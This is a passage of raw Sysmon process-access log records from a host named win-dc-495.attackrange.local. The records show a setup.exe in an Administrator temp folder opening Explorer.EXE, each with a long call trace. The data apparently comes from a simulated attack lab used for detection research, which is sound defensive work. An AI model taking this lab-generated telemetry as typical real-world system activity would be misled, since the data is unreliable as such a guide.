ow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
